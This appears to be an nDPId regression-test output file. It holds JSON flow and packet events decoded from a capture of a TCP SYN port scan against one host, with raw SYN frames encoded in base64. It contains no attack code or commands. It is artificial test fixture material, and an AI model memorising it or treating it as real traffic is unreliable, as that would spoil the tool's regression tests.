+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsY6oAADoGqsisEAAIQA2GNIzTQmDdU4MZAAAAAGACDADqKwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1096,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsLpQAAC4G696sEAAIQA2GNIzTG2vdU4MZAAAAAGACDAARIQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1097,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsLP4AADcG5HSsEAAIQA2GNIzTsCzdU4MZAAAAAGACEAB4XwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1098,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1098,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAslywAADcGekasEAAIQA2GNIzTCU3dU4MZAAAAAGACEAAfPwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1099,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1099,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsJf0AACsG93WsEAAIQA2GNIzTEV3dU4MZAAAAAGACEAAXLwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsKjYAADIG7DysEAAIQA2GNIzTBvfdU4MZAAAAAGACDAAllQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsqE0AACYGeiWsEAAIQA2GNIzSA4bdUoMYAAAAAGACDAApCQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAst3MAADIGXv+sEAAIQA2GNIzSDmrdUoMYAAAAAGACDAAeJQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAs8wcAACsGKmusEAAIQA2GNIzSH5ndUoMYAAAAAGACEAAI9gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsHA8AADEG+2OsEAAIQA2GNIzSA\/LdUoMYAAAAAGACCAAsnQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAshBYAACgGnFysEAAIQA2GNIzSINLdUoMYAAAAAGACBAATvQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAs7xUAADUGJF2sEAAIQA2GNIzSI4LdUoMYAAAAAGACCAANDQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsB\/UAADcGCX6sEAAIQA2GNIzSDcfdUoMYAAAAAGACEAAayAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAscu0AADMGooWsEAAIQA2GNIzSA+DdUoMYAAAAAGACEAAkrwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsEGAAADoG\/hKsEAAIQA2GNIzSIczdUoMYAAAAAGACDAAKwwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAs5+oAADMGLYisEAAIQA2GNIzSAP\/dUoMYAAAAAGACEAAnkAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsqIkAAC0GcumsEAAIQA2GNIzSgkrdUoMYAAAAAGACCACuRAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsqRIAADQGa2CsEAAIQA2GNIzSBBrdUoMYAAAAAGACBAAwdQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsXYYAACsGv+ysEAAIQA2GNIzSBvbdUoMYAAAAAGACEAAhmQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsMa8AAC0G6cOsEAAIQA2GNIzSAZbdUoMYAAAAAGACCAAu+QAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAs1jgAADkGOTqsEAAIQA2GNIzSWZvdUoMYAAAAAGACCADW8wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsX6EAACgGwNGsEAAIQA2GNIzTCo7dU4MZAAAAAGACBAAp\/gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsYDUAADoGrj2sEAAIQA2GNIzTE6bdU4MZAAAAAGACDAAY5gAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAs6TwAADIGLTasEAAIQA2GNIzThw3dU4MZAAAAAGACDAClfgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsEGcAACwGDAysEAAIQA2GNIzTBEvdU4MZAAAAAGACBAAwQQAAAgQFtA=="} 